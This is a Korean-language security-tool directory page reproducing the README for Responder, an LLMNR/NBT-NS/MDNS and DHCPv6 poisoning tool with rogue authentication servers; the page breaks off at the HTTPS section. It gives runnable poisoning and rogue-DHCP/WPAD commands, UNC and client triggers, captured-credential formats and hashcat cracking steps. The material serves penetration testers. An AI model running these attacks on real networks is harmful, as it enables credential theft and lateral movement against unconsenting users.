Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Responder — Responder는 LLMNR, NBT-NS 및 MDNS 중독자이며, 내장된 HTTP/SMB/MSSQL/FTP/LDAP 악성 인증 서버를 통해 NTLMv1/NTLMv2/LMv2, 확장 보안 NTLMSSP 및 Basic HTTP 인증을 지원합니다. | Kitploit
도구/GitHubGitHub/lgandx/responder
Password CrackingReconnaissancePassword AttacksDNS & Subdomain EnumerationExploitationLateral MovementInformation GatheringNetwork SecurityPenetration TestingAuthenticationDNS FuzzingRed Teaming
6.5k8671233개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
DNS Analysis
Lateral Movement #7위
Password Attacks #8위
Password Cracking #6위
GitHublgandx/responder

Responder

Responder는 LLMNR, NBT-NS 및 MDNS 중독자이며, 내장된 HTTP/SMB/MSSQL/FTP/LDAP 악성 인증 서버를 통해 NTLMv1/NTLMv2/LMv2, 확장 보안 NTLMSSP 및 Basic HTTP 인증을 지원합니다.

저장소 보기

Responder

Python Version License

Responder는 LLMNR, NBT-NS 및 MDNS 중독자로, HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS 등에 내장된 rogue 인증 서버를 제공합니다. NTLMv1/NTLMv2/LMv2, 확장 보안 NTLMSSP 및 15개 이상의 프로토콜에 걸친 다양한 인증 방식을 지원합니다.


목차

  • 개요
  • 새로운 기능
  • 설치
  • 빠른 시작
  • 네트워크 중독
  • Rogue 서버
  • 설정
  • macOS
  • 문제 해결

개요

Responder는 LLMNR, NBT-NS 및 MDNS 이름 확인 요청에 응답하여 자격 증명을 캡처합니다. 클라이언트가 존재하지 않는 호스트 이름을 확인하려고 하면 Responder가 응답하여 클라이언트를 공격자의 머신으로 유도하고, 여러 rogue 인증 서버가 자격 증명을 캡처합니다. DHCP, DHCPv6 rogue 서버도 포함되어 있으며 별도로 활성화할 수 있습니다.

캡처된 데이터:

  • NetNTLMv1/v2 해시 - hashcat/john으로 크랙 가능
  • Kerberos AS-REQ 해시 - 오프라인 크랙 (hashcat -m 7500)
  • 평문 자격 증명 - HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL 등
  • Challenge-Response - CRAM-MD5, DIGEST-MD5

새로운 기능

이 버전에는 다음이 포함됩니다:

DHCPv6 및 DNS 개선

  • ✅ DHCPv6 INFORMATION-REQUEST - Windows 10/11 완벽 호환
  • ✅ 도메인 필터링 - 특정 도메인 대상 지정 (DHCPv6 및 DNS)
  • ✅ Router Advertisements - 선택적 IPv6 네트워크 중독

이메일 서버 업그레이드

  • ✅ SMTP STARTTLS - 최신 이메일 클라이언트에서 캡처
  • ✅ IMAP STARTTLS - TLS 업그레이드로 포트 143
  • ✅ IMAPS - 포트 993에서 기본 SSL
  • ✅ 향상된 POP3 - 더 나은 호환성

Kerberos 개선

  • ✅ Force AS-REQ - Kerberos 인증 강제
  • ✅ Attempt NTLM Fallback - Kerberos 인증 후 KDC_ERR_ETYPE_NOSUPP 반환

프로토콜 개선

  • ✅ MSSQL - SQL Server 인증 캡처
  • ✅ LDAP/LDAPS - 디렉터리 서비스 자격 증명
  • ✅ RDP - 원격 데스크톱 인증
  • ✅ WinRM - Windows 원격 관리
  • ✅ DCERPC - Windows RPC 인증

설치

요구 사항

  • Python 2.7 또는 Python 3.x
  • Linux (Ubuntu, Kali, Debian 권장)
  • Root 권한

시스템 종속성```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

### Responder 설치```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

설치 확인```bash

sudo python3 Responder.py --help

---

## 빠른 시작

### 기본 포이즈닝```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6 공격```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

### HTTP 기본 인증 강제```bash
sudo python3 Responder.py -I eth0 -b -v

프록시 인증 활성화 + Rogue DHCP```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

---

## Network Poisoning

### LLMNR/NBT-NS/MDNS Poisoning

**목적:** 이름 확인 실패에 응답

**작동 방식:**
1. 클라이언트가 존재하지 않는 호스트에 대해 쿼리 브로드캐스트
2. Responder가 응답: "내가 그 호스트다"
3. 클라이언트가 공격자에 연결
4. 자격 증명 캡처

**구성:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

사용법:```bash sudo python3 Responder.py -I eth0 -v

### DHCPv6 서버

**목적:** 클라이언트가 IPv6를 통해 공격자의 DNS를 사용하도록 강제

**기능:**
- ✅ INFORMATION-REQUEST 지원 (Windows 10/11)
- ✅ SOLICIT/REQUEST 지원
- ✅ 도메인 필터링 (정밀 타겟팅)
- ✅ 라우터 광고 (선택 사항)

**작동 방식:**
1. Windows가 DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST를 전송
2. Responder가 응답: DNS = 공격자 IPv6
3. Windows가 IPv6 DNS를 우선시
4. 모든 DNS 쿼리 → 공격자
5. DNS 중독 → 자격 증명 탈취

**설정:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

사용법:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

**예상 출력:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

악성 서버

Responder에는 17개 이상의 악성 인증 서버가 포함되어 있습니다:

파일 및 네트워크 서비스

SMB 서버 (포트 445, 139)

목적: 파일 공유에서 NetNTLM 해시 캡처

기능:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ NetNTLMv1/v2 해시 캡처
  • ✅ 확장 보안 NTLMSSP
  • ✅ 세션 서명 비활성화 (릴레이 허용)

트리거:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

**캡처된 형식:**```
username::domain:challenge:response:blob

크래킹:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

**구성:**```ini
[Responder Core]
SMB = On

FTP 서버 (포트 21)

목적: 평문 FTP 자격 증명 캡처

기능:

  • ✅ 익명 로그인 허니팟
  • ✅ USER/PASS 인증
  • ✅ 평문 자격 증명 캡처

트리거:```bash ftp attacker-ip

Username: anything

Password: anything

**캡처된 형식:**```
[FTP] Cleartext: username:password

구성:```ini [Responder Core] FTP = On

---

### 데이터베이스 서버

#### MSSQL 서버 (포트 1433)

**목적:** Microsoft SQL Server 인증 캡처

**기능:**
- ✅ SQL Server 인증
- ✅ Windows 인증 (NTLM)
- ✅ 평문 SQL 자격 증명
- ✅ NetNTLMv2 해시 캡처

**트리거:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

캡처된 형식:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

**설정:**```ini
[Responder Core]
SQL = On

참고:

  • SQL 인증 및 Windows 인증을 모두 캡처합니다
  • SSMS, sqlcmd, ADO.NET 연결과 함께 작동합니다
  • Windows 인증을 통해 도메인 자격 증명을 캡처할 수 있습니다

이메일 서버

SMTP 서버 (포트 25, 587)

목적: 이메일 클라이언트 인증 캡처

기능:

  • ✅ STARTTLS 지원 (최신 클라이언트)
  • ✅ AUTH PLAIN (평문)
  • ✅ AUTH LOGIN (평문)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)

STARTTLS 흐름:``` Client → EHLO Server → 250-STARTTLS Client → STARTTLS Server → 220 Ready to start TLS [TLS handshake using self-signed cert] Client → AUTH PLAIN Server → Captured! ✅

**트리거:**```
Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything

캡처된 형식:``` [SMTP] LOGIN: [email protected]:Password123 [SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob [SMTP] CRAM-MD5: user:challenge:response

**구성:**```ini
[Responder Core]
SMTP = On

인증서 경고: 자체 서명된 인증서 경고는 정상입니다. 클라이언트는 첫 번째 시도에서 거부하고 재시도 후 성공합니다. 자격 증명은 여전히 캡처됩니다.


IMAP 서버 (Port 143)

목적: STARTTLS로 IMAP 인증 캡처

기능:

  • ✅ STARTTLS 지원
  • ✅ LOGIN 명령 (평문)
  • ✅ AUTHENTICATE PLAIN
  • ✅ AUTHENTICATE LOGIN
  • ✅ AUTHENTICATE NTLM

STARTTLS 흐름:``` Client → CAPABILITY Server → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS Client → STARTTLS Server → OK Begin TLS negotiation now [TLS upgrade] Client → LOGIN user password Server → Captured! ✅

**설정:**```ini
[Responder Core]
IMAP = On

IMAPS 서버 (포트 993)

목적: SSL을 통한 IMAP (기본 암호화)

기능:

  • ✅ 연결 시작부터 기본 SSL 적용
  • ✅ 모든 IMAP 인증 방식 지원
  • ✅ STARTTLS 불필요 (이미 암호화됨)

IMAP과의 차이점:``` Port 143 (IMAP): Plain → STARTTLS → Encrypted Port 993 (IMAPS): Encrypted from start

**구성:**```ini
[Responder Core]
IMAPS = On

POP3 서버 (포트 110)

목적: POP3 이메일 수신 자격 증명 캡처

기능:

  • ✅ USER/PASS 인증
  • ✅ APOP (MD5 챌린지)
  • ✅ 평문 자격 증명 캡처

트리거:``` Email client:

  • Protocol: POP3
  • Server: attacker-ip
  • Port: 110
**캡처된 형식:**```
[POP3] USER: username
[POP3] PASS: password

구성:```ini [Responder Core] POP = On

---

### 웹 서버

#### HTTP 서버 (포트 80)

**목적:** 웹 인증 캡처

**기능:**
- ✅ NTLM 인증 (NetNTLMv1/v2)
- ✅ 기본 인증 (평문)
- ✅ 다이제스트 인증 (MD5)
- ✅ WPAD 주입

**트리거:**```
Browser: http://attacker-ip/
UNC: file://attacker-ip/share
WPAD: Automatic proxy detection

Basic Auth 강제:```bash sudo python3 Responder.py -I eth0 -b

**캡처된 형식:**```
[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob
[HTTP] Basic: user:password
[HTTP] Digest: user:realm:hash

구성:```ini [Responder Core] HTTP = On

---

#### HTTPS 서버 (포트 443)

**목적:** 인증 캡처를 위한 HTTPS
도구 다운로드